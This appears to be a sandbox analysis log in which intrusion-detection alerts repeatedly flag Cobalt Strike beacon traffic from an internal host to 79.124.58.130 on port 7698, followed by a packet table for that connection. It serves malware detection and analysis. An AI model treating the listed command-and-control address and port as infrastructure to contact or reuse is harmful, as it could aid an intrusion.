2024-10-23T17:27:58.429740+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49846	79.124.58.130	7698	TCP
2024-10-23T17:27:59.437945+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49847	79.124.58.130	7698	TCP
2024-10-23T17:28:01.414962+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49848	79.124.58.130	7698	TCP
2024-10-23T17:28:02.440157+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49849	79.124.58.130	7698	TCP
2024-10-23T17:28:03.602837+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49850	79.124.58.130	7698	TCP
2024-10-23T17:28:04.599476+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49851	79.124.58.130	7698	TCP
2024-10-23T17:28:05.607702+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49852	79.124.58.130	7698	TCP
2024-10-23T17:28:06.622899+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49853	79.124.58.130	7698	TCP
2024-10-23T17:28:07.763719+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49854	79.124.58.130	7698	TCP
2024-10-23T17:28:08.786099+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49855	79.124.58.130	7698	TCP
2024-10-23T17:28:09.874412+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49856	79.124.58.130	7698	TCP
2024-10-23T17:28:10.898284+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49857	79.124.58.130	7698	TCP
2024-10-23T17:28:12.155030+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49858	79.124.58.130	7698	TCP
2024-10-23T17:28:13.211767+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49859	79.124.58.130	7698	TCP
2024-10-23T17:28:14.208634+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49860	79.124.58.130	7698	TCP
2024-10-23T17:28:15.433361+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49861	79.124.58.130	7698	TCP
2024-10-23T17:28:16.651853+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49862	79.124.58.130	7698	TCP
2024-10-23T17:28:17.702552+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49863	79.124.58.130	7698	TCP
2024-10-23T17:28:18.941917+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49864	79.124.58.130	7698	TCP
2024-10-23T17:28:19.971633+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49865	79.124.58.130	7698	TCP
2024-10-23T17:28:20.979463+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49866	79.124.58.130	7698	TCP
2024-10-23T17:28:22.327846+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49867	79.124.58.130	7698	TCP
2024-10-23T17:28:23.363462+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49868	79.124.58.130	7698	TCP
2024-10-23T17:28:24.371462+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49869	79.124.58.130	7698	TCP
2024-10-23T17:28:25.374228+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49870	79.124.58.130	7698	TCP
2024-10-23T17:28:26.391798+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49871	79.124.58.130	7698	TCP
2024-10-23T17:28:27.434341+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49872	79.124.58.130	7698	TCP
2024-10-23T17:28:28.438545+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49873	79.124.58.130	7698	TCP
2024-10-23T17:28:29.455492+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49874	79.124.58.130	7698	TCP
2024-10-23T17:28:30.607171+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49875	79.124.58.130	7698	TCP
2024-10-23T17:28:31.638169+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49876	79.124.58.130	7698	TCP
2024-10-23T17:28:32.655986+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49877	79.124.58.130	7698	TCP
2024-10-23T17:28:33.701720+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49878	79.124.58.130	7698	TCP
2024-10-23T17:28:34.733787+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49879	79.124.58.130	7698	TCP
2024-10-23T17:28:35.755641+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49880	79.124.58.130	7698	TCP
2024-10-23T17:28:36.772070+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49881	79.124.58.130	7698	TCP
2024-10-23T17:28:37.779606+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49882	79.124.58.130	7698	TCP
2024-10-23T17:28:38.845277+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49883	79.124.58.130	7698	TCP
2024-10-23T17:28:39.861335+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49884	79.124.58.130	7698	TCP
2024-10-23T17:28:40.913478+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49885	79.124.58.130	7698	TCP
2024-10-23T17:28:42.494449+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49886	79.124.58.130	7698	TCP
2024-10-23T17:28:43.498618+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49887	79.124.58.130	7698	TCP
2024-10-23T17:28:44.534467+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49888	79.124.58.130	7698	TCP
2024-10-23T17:28:45.575608+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49889	79.124.58.130	7698	TCP
2024-10-23T17:28:46.586053+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49890	79.124.58.130	7698	TCP
2024-10-23T17:28:47.596788+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49891	79.124.58.130	7698	TCP
2024-10-23T17:28:48.600519+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49892	79.124.58.130	7698	TCP
2024-10-23T17:28:49.820834+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49893	79.124.58.130	7698	TCP
2024-10-23T17:28:50.833141+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49894	79.124.58.130	7698	TCP
2024-10-23T17:28:51.889136+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49895	79.124.58.130	7698	TCP
2024-10-23T17:28:52.896267+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49896	79.124.58.130	7698	TCP
2024-10-23T17:28:54.102550+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49897	79.124.58.130	7698	TCP
2024-10-23T17:28:55.106382+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49898	79.124.58.130	7698	TCP
2024-10-23T17:28:56.127618+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49899	79.124.58.130	7698	TCP
2024-10-23T17:28:57.139538+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49900	79.124.58.130	7698	TCP
2024-10-23T17:28:58.154534+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49901	79.124.58.130	7698	TCP
2024-10-23T17:28:59.323597+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49902	79.124.58.130	7698	TCP
2024-10-23T17:29:00.340040+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49903	79.124.58.130	7698	TCP
2024-10-23T17:29:01.345626+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49904	79.124.58.130	7698	TCP
2024-10-23T17:29:02.372581+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49905	79.124.58.130	7698	TCP
2024-10-23T17:29:03.849528+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49906	79.124.58.130	7698	TCP
2024-10-23T17:29:04.869407+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49907	79.124.58.130	7698	TCP
2024-10-23T17:29:05.875870+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49908	79.124.58.130	7698	TCP
2024-10-23T17:29:06.902957+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49909	79.124.58.130	7698	TCP
2024-10-23T17:29:07.921685+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49910	79.124.58.130	7698	TCP
2024-10-23T17:29:09.033439+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49911	79.124.58.130	7698	TCP
2024-10-23T17:29:10.055694+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49912	79.124.58.130	7698	TCP
2024-10-23T17:29:11.045829+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49913	79.124.58.130	7698	TCP
2024-10-23T17:29:12.086129+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49914	79.124.58.130	7698	TCP
2024-10-23T17:29:13.097713+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49915	79.124.58.130	7698	TCP
2024-10-23T17:29:14.134291+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49916	79.124.58.130	7698	TCP
2024-10-23T17:29:15.143502+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49917	79.124.58.130	7698	TCP
2024-10-23T17:29:16.179586+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49918	79.124.58.130	7698	TCP
2024-10-23T17:29:17.203212+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49919	79.124.58.130	7698	TCP
2024-10-23T17:29:18.222578+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49920	79.124.58.130	7698	TCP
2024-10-23T17:29:19.507643+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49921	79.124.58.130	7698	TCP
2024-10-23T17:29:20.524138+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49922	79.124.58.130	7698	TCP
2024-10-23T17:29:21.558015+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49923	79.124.58.130	7698	TCP
2024-10-23T17:29:22.572219+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49924	79.124.58.130	7698	TCP
2024-10-23T17:29:23.584747+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49925	79.124.58.130	7698	TCP
2024-10-23T17:29:24.592453+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49926	79.124.58.130	7698	TCP
2024-10-23T17:29:25.607571+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49927	79.124.58.130	7698	TCP
2024-10-23T17:29:26.617072+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49928	79.124.58.130	7698	TCP
2024-10-23T17:29:27.621174+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49929	79.124.58.130	7698	TCP
2024-10-23T17:29:29.410434+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49930	79.124.58.130	7698	TCP
2024-10-23T17:29:30.407262+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49931	79.124.58.130	7698	TCP
2024-10-23T17:29:31.447589+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49932	79.124.58.130	7698	TCP
2024-10-23T17:29:32.450167+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49933	79.124.58.130	7698	TCP
2024-10-23T17:29:33.474198+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49934	79.124.58.130	7698	TCP
2024-10-23T17:29:34.478533+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49935	79.124.58.130	7698	TCP
2024-10-23T17:29:35.677989+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49936	79.124.58.130	7698	TCP
2024-10-23T17:29:36.868472+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49937	79.124.58.130	7698	TCP
2024-10-23T17:29:37.890344+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49938	79.124.58.130	7698	TCP
2024-10-23T17:29:38.901644+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49939	79.124.58.130	7698	TCP
2024-10-23T17:29:39.897507+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.8	49940	79.124.58.130	7698	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 23, 2024 17:25:35.301961899 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:35.307265997 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:35.307368040 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:35.307538986 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:35.312834978 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.203211069 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.203273058 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.203481913 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.203569889 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.203576088 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.203594923 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.203620911 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.203634024 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.203638077 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.203664064 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.203672886 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.203706026 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.203746080 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.203788042 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.203845978 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.203875065 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.203891993 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.203895092 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.203908920 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.203929901 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.208633900 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.208655119 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.208698988 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.208713055 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.348968029 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.349028111 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.349045038 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.349057913 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.349067926 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.349085093 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.349103928 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.349231005 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.349277973 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.349334002 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.349345922 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.349370003 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.349385977 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.349663019 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.349699020 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.349739075 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.349750996 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.349776983 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.349787951 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.349797964 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.349812984 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.350343943 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.350361109 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.350383997 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.350389957 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.350398064 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.350418091 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.350429058 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.350440979 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.468446970 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.468513966 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.468530893 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.468544006 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.468574047 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.468574047 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.468599081 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.468648911 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.468668938 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.468679905 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.468700886 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.468719006 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.469098091 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.469146967 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.469151974 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.469160080 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.469176054 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.469194889 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.469783068 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.469796896 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.469809055 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.469830036 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.469855070 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.494673014 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.494739056 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.494781017 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.494800091 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.513735056 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.513757944 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.513771057 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.513803005 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.515439034 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.588105917 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.588140965 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.588154078 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.588206053 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.588227034 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.588234901 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.588262081 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.588370085 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.588418961 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.588578939 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.588602066 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.588622093 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.588639021 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.588691950 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.588709116 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.588721037 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.588737011 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.588756084 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.633204937 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.633272886 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.633280039 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.633284092 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.633312941 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.633321047 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.633347988 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.633388996 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.633402109 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.633429050 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.707658052 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.707675934 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.707686901 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.707734108 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.707777977 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.707853079 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.707890987 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.707897902 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.707902908 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.707935095 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.707946062 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.707964897 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.707977057 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.707998991 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.708020926 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.753259897 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.753284931 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.753295898 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.753340006 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.753370047 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.753387928 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.753401041 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.753412008 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.753423929 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.753436089 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.753468037 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.753551006 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.753590107 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.753596067 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.753635883 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.827122927 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.827159882 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.827172041 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.827186108 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.827210903 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.827260971 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.827280998 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.827316046 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.827332973 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.827488899 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.827501059 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.827512980 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.827538967 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.827550888 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.827781916 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.827821970 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.828988075 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.829024076 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.872176886 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.872200012 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.872248888 CEST	7698	49705	79.124.58.130	192.168.2.8
Oct 23, 2024 17:25:36.872292042 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.872323036 CEST	49705	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:25:36.872359037 CEST	7698	49705	79.124.58.130	192.168.2.8
